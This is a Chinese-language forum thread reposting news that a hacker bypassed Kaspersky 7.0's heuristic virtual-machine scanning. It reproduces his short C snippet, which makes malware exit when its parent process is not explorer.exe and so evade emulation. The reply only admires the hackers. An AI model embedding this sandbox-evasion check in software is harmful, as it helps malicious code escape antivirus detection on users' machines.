【轉貼】卡巴斯基高級虛擬機啟發式查毒技術被中國黑客攻破(轉微風)

顯示結果從第 1 筆 到 2 筆,共計 2 筆
  1. #1
    會員 天氣預報 的大頭照
    註冊日期
    2003-02-24
    討論區文章
    2,638

    【轉貼】卡巴斯基高級虛擬機啟發式查毒技術被中國黑客攻破(轉微風)

    卡巴斯基高級虛擬機啟發式查毒技術被中國黑客攻破(轉微風)
    http://bbs.wefong.com/viewthread.php...extra=page%3D1

    11月9日,中國著名黑客xyzreg(著名的安全漏洞、安全軟件研究者,曾在中國安全第一峰會 -- 安全焦點2007峰會上做新型惡意軟件技術相關的議題演講,演講中演示了如何穿透卡巴斯基、諾頓、Mcafee等安全軟件的主動防禦體系等內容)在其BLOG上發表了一篇如何攻破卡巴斯基7.0的 「新型高級虛擬機啟髮式查毒技術」的文章,並提供了相應代碼。
    代碼可以檢測惡意程序自身是否在卡巴斯基7.0的虛擬機中運行,如果發現被卡巴斯基的虛擬機運行,則自動退出,從而使卡巴斯基無法發現程序中包含的惡意代碼。
    破解代碼如下:

    DWORD fpid,epid;

    void VMM()
    {
    PROCESSENTRY32 pe;
    HANDLE hkz=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
    pe.dwSize=sizeof(PROCESSENTRY32);
    if (Process32First(hkz,&pe))
    {
    do
    {
    if (pe.th32ProcessID==GetCurrentProcessId())
    {
    fpid=pe.th32ParentProcessID;
    }

    if (stricmp(pe.szExeFile,"explorer.exe")==0)
    {
    epid=pe.th32ProcessID;
    }
    }
    while(Process32Next(hkz,&pe));
    }
    }

    主函數里:
    VMM();
    if(fpid!=epid)
    return 0;



  2. #2
    谷樂@GoKo團長
    註冊日期
    2006-07-28
    所在地區
    CABLE
    討論區文章
    121

    回覆: 【轉貼】卡巴斯基高級虛擬機啟發式查毒技術被中國黑客攻破(轉微風)

    這些人實在是太神了
    別說他們學這些東西久
    但他們的思想頭腦比一般的人都要聰明了...呵呵

類似的主題

  1. 趨勢科技啟發式技術Intellitrap簡介及測試
    作者:harry_chang2003 所在討論版:-- 防 駭 / 防 毒 版
    回覆: 0
    最後發表: 2007-05-30, 10:59 PM
  2. 請問卡巴斯基網友,KAV真的準備放棄啟發式偵測嗎
    作者:hn1271n 所在討論版:-- 防 駭 / 防 毒 版
    回覆: 52
    最後發表: 2006-12-04, 09:35 PM
  3. 提供卡巴斯基網友一個解決防毒軟體啟發式偵測誤報的方案
    作者:hn1271n 所在討論版:-- 防 駭 / 防 毒 版
    回覆: 3
    最後發表: 2006-10-25, 04:37 PM
  4. 卡巴斯基很簡單就可以被攻破?
    作者:esjustin 所在討論版:-- 防 駭 / 防 毒 版
    回覆: 3
    最後發表: 2006-01-04, 10:57 PM
  5. 雙頭網站(倫飛)被中國黑客入侵 6/25
    作者:arthurh 所在討論版:-- 防 駭 / 防 毒 版
    回覆: 1
    最後發表: 2001-06-26, 01:05 AM

 

卡巴斯基被攻破

發表文章規則

  • 不可以發表新主題
  • 不可以回覆文章
  • 不可以上傳附加檔案
  • 不可以編輯自己的文章
  •